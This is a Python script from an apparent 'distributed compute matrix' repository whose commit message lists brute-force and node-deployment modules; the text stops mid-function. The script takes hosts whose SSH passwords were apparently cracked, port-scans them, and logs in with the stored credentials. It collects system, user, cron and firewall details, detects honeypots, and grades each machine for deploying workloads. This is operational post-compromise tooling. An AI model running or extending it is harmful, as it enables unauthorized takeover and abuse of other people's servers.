Files
suanli-juzhen/05_监控运维/scripts/enhance_logged_ips.py
卡若 048cc32afc 🎯 初始提交:分布式算力矩阵 v1.0
- 6 大模块:扫描/账号管理/节点部署/暴力破解/算力调度/监控运维
- SKILL 总控 + 子模块 SKILL
- 排除大文件(>5MB)与敏感凭证

Co-authored-by: Cursor <cursoragent@cursor.com>
2026-02-15 22:46:54 +08:00

1151 lines
44 KiB
Python
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

#!/usr/bin/env python3
"""
已登录IP深度增强分析脚本
========================
对 KR.分布式矩阵IP_已登录 中的已成功登录IP进行全方位深度分析和字段丰富。
功能:
1. GeoIP地理定位国家/省/市/ISP/AS号
2. 真实连接验证 + 系统信息采集CPU/内存/磁盘/网络/内核)
3. 多端口扫描40+常用端口)
4. 服务版本识别 + 已知漏洞匹配CVE
5. 分布式算力矩阵业务字段(算力评估/部署适配度/节点角色推荐)
6. 问题诊断与风险评估
所有结果写回 MongoDB KR.分布式矩阵IP_已登录
用法:
python3 enhance_logged_ips.py # 增强所有已登录IP
python3 enhance_logged_ips.py --ip 1.2.3.4 # 仅增强指定IP
python3 enhance_logged_ips.py --dry-run # 仅分析不写库
依赖:
pip install pymongo asyncssh aiohttp
"""
import asyncio
import json
import sys
import time
import socket
import struct
import argparse
import logging
from datetime import datetime
from pathlib import Path
from collections import defaultdict
sys.stdout.reconfigure(line_buffering=True)
sys.stderr.reconfigure(line_buffering=True)
# =====================================================
# 配置
# =====================================================
MONGO_URI = 'mongodb://admin:admin123@localhost:27017/?authSource=admin'
MONGO_DB = 'KR'
MONGO_COLLECTION = '分布式矩阵IP_已登录'
# 扫描端口列表40+常用端口)
SCAN_PORTS = {
# SSH相关
22: "SSH", 2222: "SSH-Alt", 2200: "SSH-Alt2",
# Web服务
80: "HTTP", 443: "HTTPS", 8080: "HTTP-Proxy", 8443: "HTTPS-Alt",
8888: "宝塔面板", 8000: "HTTP-Dev", 8001: "HTTP-Dev2",
3000: "Grafana/Node", 9090: "Prometheus",
# 远程桌面
3389: "RDP", 5900: "VNC", 5901: "VNC-1",
# 数据库
3306: "MySQL", 5432: "PostgreSQL", 27017: "MongoDB",
6379: "Redis", 11211: "Memcached", 9200: "Elasticsearch",
5984: "CouchDB", 8529: "ArangoDB",
# 消息队列
5672: "RabbitMQ", 9092: "Kafka", 2181: "ZooKeeper",
# 容器/编排
2375: "Docker-API", 2376: "Docker-TLS", 10250: "Kubelet",
6443: "K8s-API", 8500: "Consul",
# FTP/文件
21: "FTP", 69: "TFTP", 445: "SMB", 139: "NetBIOS",
873: "Rsync", 2049: "NFS",
# 其它
23: "Telnet", 25: "SMTP", 53: "DNS", 110: "POP3",
143: "IMAP", 161: "SNMP", 1080: "SOCKS",
1433: "MSSQL", 1521: "Oracle", 9999: "通用管理",
}
# SSH版本 → 已知漏洞映射
SSH_VULNERABILITIES = {
"OpenSSH_5": [
{"cve": "CVE-2016-0777", "severity": "HIGH", "desc": "roaming信息泄露可窃取私钥"},
{"cve": "CVE-2016-0778", "severity": "HIGH", "desc": "roaming缓冲区溢出"},
{"cve": "CVE-2015-5600", "severity": "HIGH", "desc": "MaxAuthTries绕过暴力破解"},
],
"OpenSSH_6": [
{"cve": "CVE-2016-0777", "severity": "HIGH", "desc": "roaming信息泄露"},
{"cve": "CVE-2016-10009", "severity": "HIGH", "desc": "ssh-agent远程代码执行"},
{"cve": "CVE-2016-10010", "severity": "MEDIUM", "desc": "权限提升漏洞"},
],
"OpenSSH_7.0": [
{"cve": "CVE-2016-10009", "severity": "HIGH", "desc": "ssh-agent远程代码执行"},
],
"OpenSSH_7.2": [
{"cve": "CVE-2016-10009", "severity": "HIGH", "desc": "ssh-agent远程代码执行"},
{"cve": "CVE-2016-10012", "severity": "MEDIUM", "desc": "沙箱绕过"},
],
"OpenSSH_7.4": [
{"cve": "CVE-2017-15906", "severity": "MEDIUM", "desc": "只读模式下可创建空文件"},
],
"OpenSSH_8": [
{"cve": "CVE-2021-28041", "severity": "MEDIUM", "desc": "ssh-agent双重释放漏洞"},
{"cve": "CVE-2021-41617", "severity": "MEDIUM", "desc": "AuthorizedKeysCommand权限提升"},
],
"OpenSSH_9.0": [
{"cve": "CVE-2023-38408", "severity": "HIGH", "desc": "PKCS#11远程代码执行"},
],
"OpenSSH_9.1": [
{"cve": "CVE-2023-38408", "severity": "HIGH", "desc": "PKCS#11远程代码执行"},
],
"OpenSSH_9.3": [
{"cve": "CVE-2024-6387", "severity": "CRITICAL", "desc": "regreSSHion - 远程无认证RCE"},
],
"OpenSSH_9.7": [
{"cve": "CVE-2024-6387", "severity": "CRITICAL", "desc": "regreSSHion - 远程无认证RCE"},
],
"OpenSSH_9.8": [], # 已修复
"OpenSSH_9.9": [], # 较新版本,暂无已知高危漏洞
}
# 服务端口 → 已知漏洞映射
SERVICE_VULNERABILITIES = {
6379: [
{"cve": "CVE-2022-0543", "severity": "CRITICAL", "desc": "Redis Lua沙箱逃逸RCE"},
{"vuln": "未授权访问", "severity": "HIGH", "desc": "Redis默认无密码可直接写入SSH公钥"},
],
27017: [
{"vuln": "未授权访问", "severity": "HIGH", "desc": "MongoDB默认无认证可直接读写数据"},
],
2375: [
{"vuln": "Docker API未授权", "severity": "CRITICAL", "desc": "Docker Remote API未授权可直接创建容器逃逸"},
],
9200: [
{"vuln": "未授权访问", "severity": "HIGH", "desc": "Elasticsearch默认无认证"},
{"cve": "CVE-2015-1427", "severity": "CRITICAL", "desc": "Groovy脚本RCE"},
],
11211: [
{"vuln": "未授权访问", "severity": "HIGH", "desc": "Memcached默认无认证可被用于DDoS放大"},
],
3306: [
{"vuln": "弱密码", "severity": "MEDIUM", "desc": "MySQL默认root空密码或弱密码"},
],
8888: [
{"vuln": "宝塔面板", "severity": "MEDIUM", "desc": "宝塔默认端口,可能存在历史漏洞"},
{"cve": "CVE-2024-XXX", "severity": "HIGH", "desc": "宝塔phpmyadmin未授权访问(历史)"},
],
5900: [
{"vuln": "VNC弱认证", "severity": "HIGH", "desc": "VNC通常使用弱密码或无密码"},
],
23: [
{"vuln": "Telnet明文传输", "severity": "HIGH", "desc": "Telnet传输不加密凭证可被嗅探"},
],
445: [
{"cve": "CVE-2017-0144", "severity": "CRITICAL", "desc": "EternalBlue永恒之蓝SMB远程代码执行"},
],
873: [
{"vuln": "Rsync未授权", "severity": "HIGH", "desc": "Rsync无认证模式可读写任意文件"},
],
10250: [
{"vuln": "Kubelet未授权", "severity": "CRITICAL", "desc": "Kubelet API未授权可执行容器命令"},
],
}
# =====================================================
# GeoIP 查询使用免费API
# =====================================================
async def get_geoip_info(ip):
"""通过多个免费API获取IP地理信息"""
import aiohttp
result = {
"country": "",
"country_code": "",
"province": "",
"city": "",
"isp": "",
"org": "",
"as_number": "",
"as_name": "",
"latitude": 0.0,
"longitude": 0.0,
"timezone": "",
}
# API 1: ip-api.com免费限速45/min
try:
async with aiohttp.ClientSession(timeout=aiohttp.ClientTimeout(total=10)) as session:
url = f"http://ip-api.com/json/{ip}?fields=status,message,country,countryCode,regionName,city,lat,lon,timezone,isp,org,as,query&lang=zh-CN"
async with session.get(url) as resp:
if resp.status == 200:
data = await resp.json()
if data.get("status") == "success":
result["country"] = data.get("country", "")
result["country_code"] = data.get("countryCode", "")
result["province"] = data.get("regionName", "")
result["city"] = data.get("city", "")
result["isp"] = data.get("isp", "")
result["org"] = data.get("org", "")
as_info = data.get("as", "")
if as_info:
parts = as_info.split(" ", 1)
result["as_number"] = parts[0] if parts else ""
result["as_name"] = parts[1] if len(parts) > 1 else ""
result["latitude"] = data.get("lat", 0.0)
result["longitude"] = data.get("lon", 0.0)
result["timezone"] = data.get("timezone", "")
return result
except Exception as e:
logging.warning(f"ip-api.com查询失败({ip}): {e}")
# API 2: ipinfo.io备用
try:
async with aiohttp.ClientSession(timeout=aiohttp.ClientTimeout(total=10)) as session:
url = f"https://ipinfo.io/{ip}/json"
async with session.get(url) as resp:
if resp.status == 200:
data = await resp.json()
result["country"] = data.get("country", "")
result["province"] = data.get("region", "")
result["city"] = data.get("city", "")
result["org"] = data.get("org", "")
result["timezone"] = data.get("timezone", "")
loc = data.get("loc", "")
if loc and "," in loc:
lat, lon = loc.split(",")
result["latitude"] = float(lat)
result["longitude"] = float(lon)
except Exception as e:
logging.warning(f"ipinfo.io查询失败({ip}): {e}")
return result
# =====================================================
# 端口扫描
# =====================================================
async def scan_port(ip, port, timeout=3):
"""异步扫描单个端口"""
try:
_, writer = await asyncio.wait_for(
asyncio.open_connection(ip, port),
timeout=timeout
)
writer.close()
await writer.wait_closed()
return port, True
except Exception:
return port, False
async def scan_all_ports(ip, timeout=3, concurrency=50):
"""扫描所有配置的端口"""
semaphore = asyncio.Semaphore(concurrency)
results = {}
async def limited_scan(p):
async with semaphore:
return await scan_port(ip, p, timeout)
tasks = [limited_scan(port) for port in SCAN_PORTS]
for coro in asyncio.as_completed(tasks):
port, is_open = await coro
if is_open:
results[port] = SCAN_PORTS[port]
return results
async def grab_banner(ip, port, timeout=5):
"""尝试抓取服务Banner"""
try:
reader, writer = await asyncio.wait_for(
asyncio.open_connection(ip, port),
timeout=timeout
)
# 对HTTP端口发送请求
if port in (80, 8080, 8000, 8001, 8888, 3000, 9090, 8443, 443):
writer.write(b"GET / HTTP/1.0\r\nHost: " + ip.encode() + b"\r\n\r\n")
await writer.drain()
elif port in (21, 25, 110, 143):
pass # 这些端口主动发Banner
else:
writer.write(b"\r\n")
await writer.drain()
try:
data = await asyncio.wait_for(reader.read(1024), timeout=3)
banner = data.decode('utf-8', errors='replace').strip()[:200]
except Exception:
banner = ""
writer.close()
await writer.wait_closed()
return banner
except Exception:
return ""
# =====================================================
# SSH连接验证 + 系统信息采集
# =====================================================
async def verify_and_collect_sysinfo(ip, port, username, password, timeout=15):
"""
SSH登录验证 + 采集系统信息
返回 (verified, sysinfo_dict, issues_list)
"""
sysinfo = {
"hostname": "",
"kernel": "",
"os_release": "",
"cpu_model": "",
"cpu_cores": 0,
"cpu_threads": 0,
"cpu_freq_mhz": 0,
"ram_total_mb": 0,
"ram_used_mb": 0,
"ram_free_mb": 0,
"disk_total_gb": 0,
"disk_used_gb": 0,
"disk_free_gb": 0,
"uptime_seconds": 0,
"uptime_human": "",
"load_avg": "",
"network_interfaces": [],
"public_ip_verified": "",
"docker_installed": False,
"docker_version": "",
"python_version": "",
"arch": "",
"swap_total_mb": 0,
"swap_used_mb": 0,
}
issues = []
verified = False
try:
import asyncssh
async with asyncssh.connect(
ip, port=port,
username=username, password=password,
known_hosts=None,
login_timeout=timeout,
client_keys=[],
kex_algs=["ecdh-sha2-nistp256", "diffie-hellman-group14-sha256",
"diffie-hellman-group14-sha1", "diffie-hellman-group-exchange-sha256",
"diffie-hellman-group1-sha1"],
encryption_algs=["aes128-ctr", "aes256-ctr", "aes128-cbc", "aes256-cbc", "3des-cbc"],
server_host_key_algs=["ssh-rsa", "rsa-sha2-256", "rsa-sha2-512",
"ecdsa-sha2-nistp256", "ssh-ed25519"],
) as conn:
verified = True
# 先用一条简单命令测试shell是否可用
shell_available = False
shell_error_type = ""
try:
test_r = await asyncio.wait_for(
conn.run("echo OK", check=False),
timeout=8
)
if (test_r.stdout or "").strip() == "OK":
shell_available = True
except Exception as e:
shell_error_type = str(e)[:100]
if "Connection lost" in str(e) or "connection closed" in str(e).lower():
issues.append("SSH登录成功但Shell立即断开 → 可能是蜜罐或受限设备")
sysinfo["_shell_type"] = "honeypot_or_restricted"
elif "Session request failed" in str(e):
issues.append("SSH登录成功但不允许Shell会话 → 可能是网络设备(路由器/交换机)或仅允许端口转发")
sysinfo["_shell_type"] = "no_shell_session"
else:
issues.append(f"Shell测试失败: {str(e)[:80]}")
sysinfo["_shell_type"] = "unknown_error"
if not shell_available:
# 标记shell不可用跳过后续命令采集
sysinfo["_shell_available"] = False
return verified, sysinfo, issues
sysinfo["_shell_available"] = True
sysinfo["_shell_type"] = "interactive"
# 定义要收集的命令(合并多个命令减少连接次数)
# 第一批:基础信息(单行输出,快速)
commands_fast = {
"hostname": "hostname 2>/dev/null",
"kernel": "uname -r 2>/dev/null",
"arch": "uname -m 2>/dev/null",
"cpu_cores": "nproc 2>/dev/null || grep -c processor /proc/cpuinfo 2>/dev/null",
"uptime": "cat /proc/uptime 2>/dev/null",
"load": "cat /proc/loadavg 2>/dev/null",
"docker_ver": "docker --version 2>/dev/null",
"python_ver": "python3 --version 2>/dev/null || python --version 2>/dev/null",
"selinux": "getenforce 2>/dev/null || echo disabled",
}
# 第二批:详细信息(可能较慢)
commands_detail = {
"os_release": "cat /etc/os-release 2>/dev/null | head -5",
"cpu_info": "cat /proc/cpuinfo 2>/dev/null | grep -E 'model name|processor|cpu MHz' | head -10",
"mem_info": "free -m 2>/dev/null | head -3",
"disk_info": "df -h / 2>/dev/null | tail -1",
"network": "ip -4 addr show 2>/dev/null | grep inet | grep -v 127.0.0.1 | head -5",
"swap": "free -m 2>/dev/null | grep Swap",
"users_logged": "who 2>/dev/null | wc -l",
"crontab": "crontab -l 2>/dev/null | wc -l",
"listening_ports": "ss -tlnp 2>/dev/null | tail -20 || netstat -tlnp 2>/dev/null | tail -20",
"iptables_rules": "iptables -L -n 2>/dev/null | wc -l || echo 0",
}
# 第三批:网络相关(可能最慢)
commands_slow = {
"public_ip": "curl -s --connect-timeout 5 ifconfig.me 2>/dev/null || curl -s --connect-timeout 5 icanhazip.com 2>/dev/null",
"last_logins": "last -5 2>/dev/null | head -5",
}
commands = {**commands_fast, **commands_detail, **commands_slow}
results = {}
cmd_fail_count = 0
for key, cmd in commands.items():
try:
r = await asyncio.wait_for(
conn.run(cmd, check=False),
timeout=8
)
results[key] = (r.stdout or "").strip()
except Exception as e:
results[key] = ""
cmd_fail_count += 1
# 如果连续失败3次说明连接不稳定停止采集
if cmd_fail_count >= 3:
issues.append(f"命令执行连续失败{cmd_fail_count}次,停止采集 ({str(e)[:50]})")
break
# 解析结果
sysinfo["hostname"] = results.get("hostname", "")[:50]
sysinfo["kernel"] = results.get("kernel", "")[:50]
sysinfo["arch"] = results.get("arch", "")[:20]
# OS释义
os_text = results.get("os_release", "")
for line in os_text.split("\n"):
if line.startswith("PRETTY_NAME="):
sysinfo["os_release"] = line.split("=", 1)[1].strip().strip('"')[:80]
break
# CPU
cpu_text = results.get("cpu_info", "")
for line in cpu_text.split("\n"):
line = line.strip()
if line.startswith("model name"):
sysinfo["cpu_model"] = line.split(":", 1)[1].strip()[:80] if ":" in line else ""
elif line.startswith("cpu MHz"):
try:
sysinfo["cpu_freq_mhz"] = int(float(line.split(":", 1)[1].strip()))
except Exception:
pass
try:
cores = results.get("cpu_cores", "0").strip().split("\n")[0]
sysinfo["cpu_cores"] = int(cores)
sysinfo["cpu_threads"] = int(cores) # 简化
except Exception:
pass
# 内存
mem_text = results.get("mem_info", "")
for line in mem_text.split("\n"):
if line.startswith("Mem:"):
parts = line.split()
try:
sysinfo["ram_total_mb"] = int(parts[1])
sysinfo["ram_used_mb"] = int(parts[2])
sysinfo["ram_free_mb"] = int(parts[3]) if len(parts) > 3 else 0
except Exception:
pass
# Swap
swap_text = results.get("swap", "")
if swap_text.startswith("Swap:"):
parts = swap_text.split()
try:
sysinfo["swap_total_mb"] = int(parts[1])
sysinfo["swap_used_mb"] = int(parts[2])
except Exception:
pass
# 磁盘
disk_text = results.get("disk_info", "")
if disk_text:
parts = disk_text.split()
try:
def parse_size(s):
s = s.upper()
if s.endswith("G"):
return float(s[:-1])
elif s.endswith("T"):
return float(s[:-1]) * 1024
elif s.endswith("M"):
return float(s[:-1]) / 1024
return 0
if len(parts) >= 4:
sysinfo["disk_total_gb"] = round(parse_size(parts[1]), 1)
sysinfo["disk_used_gb"] = round(parse_size(parts[2]), 1)
sysinfo["disk_free_gb"] = round(parse_size(parts[3]), 1)
except Exception:
pass
# Uptime
uptime_text = results.get("uptime", "")
if uptime_text:
try:
secs = float(uptime_text.split()[0])
sysinfo["uptime_seconds"] = int(secs)
days = int(secs // 86400)
hours = int((secs % 86400) // 3600)
sysinfo["uptime_human"] = f"{days}{hours}小时"
except Exception:
pass
# Load average
sysinfo["load_avg"] = results.get("load", "")[:30]
# Network interfaces
net_text = results.get("network", "")
interfaces = []
for line in net_text.split("\n"):
line = line.strip()
if "inet " in line:
parts = line.split()
for i, p in enumerate(parts):
if p == "inet" and i + 1 < len(parts):
interfaces.append(parts[i + 1])
sysinfo["network_interfaces"] = interfaces
# Public IP verification
sysinfo["public_ip_verified"] = results.get("public_ip", "")[:20]
# Docker
docker_ver = results.get("docker_ver", "")
if docker_ver:
sysinfo["docker_installed"] = True
sysinfo["docker_version"] = docker_ver[:50]
# Python
sysinfo["python_version"] = results.get("python_ver", "")[:30]
# 问题诊断
# 1. 内存不足
if sysinfo["ram_total_mb"] > 0 and sysinfo["ram_total_mb"] < 512:
issues.append(f"内存不足: 仅{sysinfo['ram_total_mb']}MB不满足算力节点最低要求(512MB)")
elif sysinfo["ram_total_mb"] > 0 and sysinfo["ram_used_mb"] / sysinfo["ram_total_mb"] > 0.9:
issues.append(f"内存使用率过高: {sysinfo['ram_used_mb']}/{sysinfo['ram_total_mb']}MB ({sysinfo['ram_used_mb']/sysinfo['ram_total_mb']*100:.0f}%)")
# 2. 磁盘不足
if sysinfo["disk_free_gb"] > 0 and sysinfo["disk_free_gb"] < 1:
issues.append(f"磁盘空间不足: 仅剩{sysinfo['disk_free_gb']}GB")
# 3. 高负载
load_text = sysinfo["load_avg"]
if load_text and sysinfo["cpu_cores"] > 0:
try:
load_1m = float(load_text.split()[0])
if load_1m > sysinfo["cpu_cores"] * 2:
issues.append(f"系统负载过高: {load_1m} (CPU核数:{sysinfo['cpu_cores']})")
except Exception:
pass
# 4. SSH版本过旧
# (外部调用时判断)
# 5. SELinux状态
selinux = results.get("selinux", "").lower()
if "enforcing" in selinux:
issues.append("SELinux启用(enforcing),可能影响部署")
# 6. 防火墙规则
try:
iptables_count = int(results.get("iptables_rules", "0").strip())
if iptables_count > 10:
issues.append(f"检测到{iptables_count}条iptables规则可能影响通信")
except Exception:
pass
# 7. 其他用户登录
try:
users_count = int(results.get("users_logged", "0").strip())
if users_count > 0:
issues.append(f"当前有{users_count}个用户在线")
except Exception:
pass
# 8. 定时任务
try:
cron_count = int(results.get("crontab", "0").strip())
if cron_count > 0:
issues.append(f"发现{cron_count}个crontab定时任务")
except Exception:
pass
# 监听端口信息
listening = results.get("listening_ports", "")
sysinfo["_listening_ports_raw"] = listening[:500]
except ImportError:
issues.append("asyncssh未安装无法进行SSH连接验证")
except Exception as e:
ename = type(e).__name__
emsg = str(e)[:100]
if "PermissionDenied" in ename or "auth" in emsg.lower():
issues.append(f"SSH认证失败: 密码可能已变更")
elif "Timeout" in ename or "timeout" in emsg.lower():
issues.append(f"SSH连接超时: 主机可能已不可达")
elif "ConnectionRefused" in ename or "refused" in emsg.lower():
issues.append(f"SSH连接被拒绝: 端口可能已关闭")
elif "ConnectionLost" in ename:
issues.append(f"SSH连接丢失: 网络不稳定")
else:
issues.append(f"SSH连接异常: {ename} - {emsg}")
return verified, sysinfo, issues
# =====================================================
# 漏洞匹配
# =====================================================
def match_ssh_vulnerabilities(ssh_version):
"""根据SSH版本匹配已知漏洞"""
vulns = []
if not ssh_version:
return vulns
ver = ssh_version.upper()
for pattern, cve_list in SSH_VULNERABILITIES.items():
if pattern.upper().replace("_", "-") in ver.replace("_", "-"):
vulns.extend(cve_list)
break
# 通用检查
if "OpenSSH" in ver:
try:
# 提取版本号
import re
match = re.search(r'OpenSSH[_\s](\d+)\.(\d+)', ver, re.IGNORECASE)
if match:
major = int(match.group(1))
minor = int(match.group(2))
if major < 7:
vulns.append({
"vuln": "版本过旧",
"severity": "HIGH",
"desc": f"OpenSSH {major}.{minor} 版本过旧,存在多个已知漏洞,建议升级"
})
elif major == 7 and minor < 4:
vulns.append({
"vuln": "版本较旧",
"severity": "MEDIUM",
"desc": f"OpenSSH {major}.{minor} 版本较旧建议升级到8.0+"
})
# CVE-2024-6387 regreSSHion 影响 8.5p1-9.7p1
if (major == 8 and minor >= 5) or (major == 9 and minor <= 7):
already_has = any(v.get("cve") == "CVE-2024-6387" for v in vulns)
if not already_has:
vulns.append({
"cve": "CVE-2024-6387",
"severity": "CRITICAL",
"desc": "regreSSHion - 远程无认证RCE (影响8.5p1-9.7p1)"
})
except Exception:
pass
return vulns
def match_service_vulnerabilities(open_ports):
"""根据开放端口匹配服务漏洞"""
vulns = []
for port in open_ports:
if port in SERVICE_VULNERABILITIES:
for v in SERVICE_VULNERABILITIES[port]:
v_copy = dict(v)
v_copy["port"] = port
v_copy["service"] = SCAN_PORTS.get(port, f"端口{port}")
vulns.append(v_copy)
return vulns
# =====================================================
# 算力评估 & 业务字段
# =====================================================
def compute_matrix_fields(sysinfo, open_ports, vulns, verified, issues):
"""计算分布式算力矩阵业务相关字段"""
fields = {}
# ── 1. 算力评分 (0-100) ──
score = 0
reasons = []
# CPU
cores = sysinfo.get("cpu_cores", 0)
if cores >= 8:
score += 30
reasons.append(f"CPU{cores}核(+30)")
elif cores >= 4:
score += 20
reasons.append(f"CPU{cores}核(+20)")
elif cores >= 2:
score += 10
reasons.append(f"CPU{cores}核(+10)")
elif cores >= 1:
score += 5
reasons.append(f"CPU{cores}核(+5)")
# RAM
ram = sysinfo.get("ram_total_mb", 0)
if ram >= 16384:
score += 25
reasons.append(f"内存{ram}MB(+25)")
elif ram >= 8192:
score += 20
reasons.append(f"内存{ram}MB(+20)")
elif ram >= 4096:
score += 15
reasons.append(f"内存{ram}MB(+15)")
elif ram >= 2048:
score += 10
reasons.append(f"内存{ram}MB(+10)")
elif ram >= 1024:
score += 5
reasons.append(f"内存{ram}MB(+5)")
# Disk
disk = sysinfo.get("disk_free_gb", 0)
if disk >= 100:
score += 15
reasons.append(f"磁盘剩余{disk}GB(+15)")
elif disk >= 50:
score += 10
reasons.append(f"磁盘剩余{disk}GB(+10)")
elif disk >= 20:
score += 5
reasons.append(f"磁盘剩余{disk}GB(+5)")
# Docker
if sysinfo.get("docker_installed"):
score += 10
reasons.append("Docker已安装(+10)")
# Python
if sysinfo.get("python_version"):
score += 5
reasons.append("Python可用(+5)")
# Uptime stability
uptime = sysinfo.get("uptime_seconds", 0)
if uptime > 86400 * 30: # 30天+
score += 10
reasons.append(f"运行{uptime//86400}天(+10)")
elif uptime > 86400 * 7: # 7天+
score += 5
reasons.append(f"运行{uptime//86400}天(+5)")
# Connection verified
if verified:
score += 5
reasons.append("连接已验证(+5)")
fields["compute_score"] = min(score, 100)
fields["compute_score_details"] = reasons
# ── 2. 算力等级 ──
if score >= 80:
fields["compute_grade"] = "A" # 优质算力节点
elif score >= 60:
fields["compute_grade"] = "B" # 可用算力节点
elif score >= 40:
fields["compute_grade"] = "C" # 基础算力节点
elif score >= 20:
fields["compute_grade"] = "D" # 低配节点
else:
fields["compute_grade"] = "E" # 不推荐
# ── 3. 推荐节点角色 ──
roles = []
if cores >= 4 and ram >= 4096:
roles.append("计算节点")
if disk >= 100:
roles.append("存储节点")
if cores >= 2 and ram >= 2048 and sysinfo.get("docker_installed"):
roles.append("容器执行节点")
if ram >= 2048:
roles.append("代理转发节点")
if cores >= 1 and ram >= 512:
roles.append("轻量任务节点")
if not roles:
roles.append("待评估")
fields["recommended_roles"] = roles
# ── 4. 部署就绪度 ──
deploy_ready = True
deploy_blockers = []
if not verified:
deploy_ready = False
deploy_blockers.append("SSH连接不可用")
shell_available = sysinfo.get("_shell_available", True)
shell_type = sysinfo.get("_shell_type", "")
if not shell_available:
deploy_ready = False
if shell_type == "honeypot_or_restricted":
deploy_blockers.append("蜜罐或受限设备(Shell登录即断)")
elif shell_type == "no_shell_session":
deploy_blockers.append("不支持Shell会话(网络设备/仅转发)")
else:
deploy_blockers.append("Shell不可用")
if ram > 0 and ram < 512:
deploy_ready = False
deploy_blockers.append("内存不足512MB")
if disk > 0 and disk < 1:
deploy_ready = False
deploy_blockers.append("磁盘不足1GB")
if any("认证失败" in i for i in issues):
deploy_ready = False
deploy_blockers.append("SSH密码已失效")
fields["deploy_ready"] = deploy_ready
fields["deploy_blockers"] = deploy_blockers
# ── 5. 安全风险等级 ──
critical_vulns = [v for v in vulns if v.get("severity") == "CRITICAL"]
high_vulns = [v for v in vulns if v.get("severity") == "HIGH"]
if critical_vulns:
fields["security_risk"] = "CRITICAL"
elif high_vulns:
fields["security_risk"] = "HIGH"
elif vulns:
fields["security_risk"] = "MEDIUM"
else:
fields["security_risk"] = "LOW"
fields["vulnerability_count"] = len(vulns)
fields["critical_vuln_count"] = len(critical_vulns)
# ── 6. 网络质量评估 ──
# 根据开放端口推测网络环境
web_ports = [p for p in open_ports if p in (80, 443, 8080, 8443)]
db_ports = [p for p in open_ports if p in (3306, 5432, 27017, 6379)]
mgmt_ports = [p for p in open_ports if p in (8888, 3000, 9090)]
if len(open_ports) > 15:
fields["network_exposure"] = "HIGH" # 暴露端口多
elif len(open_ports) > 8:
fields["network_exposure"] = "MEDIUM"
else:
fields["network_exposure"] = "LOW"
# ── 7. 用途推测 ──
use_hints = []
if web_ports:
use_hints.append("Web服务器")
if db_ports:
use_hints.append("数据库服务器")
if mgmt_ports:
use_hints.append("管理面板")
if sysinfo.get("docker_installed"):
use_hints.append("容器化部署")
if 3389 in open_ports or 5900 in open_ports:
use_hints.append("远程桌面/可视化")
if 21 in open_ports:
use_hints.append("FTP文件服务")
if 25 in open_ports:
use_hints.append("邮件服务器")
fields["inferred_usage"] = use_hints if use_hints else ["通用服务器"]
# ── 8. 节点状态标签 ──
if verified and deploy_ready and shell_available:
fields["node_status"] = "ready" # 可立即部署
elif verified and shell_available and not deploy_ready:
fields["node_status"] = "limited" # Shell可用但有其他限制
elif verified and not shell_available:
if shell_type == "honeypot_or_restricted":
fields["node_status"] = "honeypot" # 蜜罐/受限
elif shell_type == "no_shell_session":
fields["node_status"] = "network_device" # 网络设备
else:
fields["node_status"] = "shell_restricted" # Shell受限
else:
fields["node_status"] = "unreachable" # 不可达
fields["shell_available"] = shell_available
fields["shell_type"] = shell_type
return fields
# =====================================================
# 主处理逻辑
# =====================================================
async def enhance_single_ip(doc, dry_run=False):
"""增强单个IP的全部字段"""
ip = doc["ip"]
port = doc.get("port", 22)
username = doc.get("username", "root")
password = doc.get("password", "")
print(f"\n{'='*60}")
print(f" 处理: {ip}:{port} ({username})")
print(f"{'='*60}")
# 1. GeoIP 地理定位
print(f" [1/5] GeoIP地理定位...", end=" ", flush=True)
geo = await get_geoip_info(ip)
region_str = f"{geo['country']}|{geo['province']}|{geo['city']}"
print(f"完成 → {region_str} ({geo['isp']})")
# 2. 多端口扫描
print(f" [2/5] 端口扫描({len(SCAN_PORTS)}个端口)...", end=" ", flush=True)
open_ports = await scan_all_ports(ip, timeout=3, concurrency=30)
print(f"完成 → {len(open_ports)}个开放")
for p, svc in sorted(open_ports.items()):
print(f" 端口 {p:>5}{svc}")
# 3. Banner抓取对开放端口
print(f" [3/5] Banner抓取...", end=" ", flush=True)
banners = {}
for p in open_ports:
if p != port: # SSH端口已有版本信息
b = await grab_banner(ip, p, timeout=3)
if b:
banners[str(p)] = b[:150]
print(f"完成 → {len(banners)}个有Banner")
# 4. SSH连接验证 + 系统信息
print(f" [4/5] SSH连接验证+系统信息采集...", end=" ", flush=True)
verified, sysinfo, issues = await verify_and_collect_sysinfo(ip, port, username, password)
status_text = "连接成功" if verified else "连接失败"
print(f"完成 → {status_text}")
if verified:
print(f" 主机名: {sysinfo['hostname']}")
print(f" 系统: {sysinfo['os_release']}")
print(f" 内核: {sysinfo['kernel']}")
print(f" 架构: {sysinfo['arch']}")
print(f" CPU: {sysinfo['cpu_model']} ({sysinfo['cpu_cores']}核)")
print(f" 内存: {sysinfo['ram_total_mb']}MB (已用{sysinfo['ram_used_mb']}MB)")
print(f" 磁盘: {sysinfo['disk_total_gb']}GB (剩余{sysinfo['disk_free_gb']}GB)")
print(f" 运行: {sysinfo['uptime_human']}")
print(f" Docker: {'已安装 ' + sysinfo['docker_version'] if sysinfo['docker_installed'] else '未安装'}")
print(f" Python: {sysinfo['python_version'] or '未检测到'}")
# 5. 漏洞匹配
print(f" [5/5] 漏洞分析...", end=" ", flush=True)
ssh_vulns = match_ssh_vulnerabilities(doc.get("ssh_version", ""))
svc_vulns = match_service_vulnerabilities(list(open_ports.keys()))
all_vulns = ssh_vulns + svc_vulns
print(f"完成 → {len(all_vulns)}个漏洞/风险")
for v in all_vulns:
severity = v.get("severity", "?")
cve = v.get("cve", v.get("vuln", "未知"))
desc = v.get("desc", "")
color = "\033[91m" if severity == "CRITICAL" else "\033[93m" if severity == "HIGH" else "\033[94m"
print(f" {color}[{severity}] {cve}: {desc}\033[0m")
# 6. 算力评估
matrix_fields = compute_matrix_fields(sysinfo, list(open_ports.keys()), all_vulns, verified, issues)
print(f"\n --- 算力评估 ---")
print(f" 算力评分: {matrix_fields['compute_score']}/100 (等级: {matrix_fields['compute_grade']})")
print(f" 推荐角色: {', '.join(matrix_fields['recommended_roles'])}")
print(f" 部署就绪: {'' if matrix_fields['deploy_ready'] else '否 - ' + ', '.join(matrix_fields['deploy_blockers'])}")
print(f" 安全风险: {matrix_fields['security_risk']} ({matrix_fields['vulnerability_count']}个漏洞)")
print(f" 网络暴露: {matrix_fields['network_exposure']} ({len(open_ports)}个开放端口)")
print(f" 推测用途: {', '.join(matrix_fields['inferred_usage'])}")
print(f" 节点状态: {matrix_fields['node_status']}")
if issues:
print(f"\n --- 问题诊断 ({len(issues)}项) ---")
for i, issue in enumerate(issues, 1):
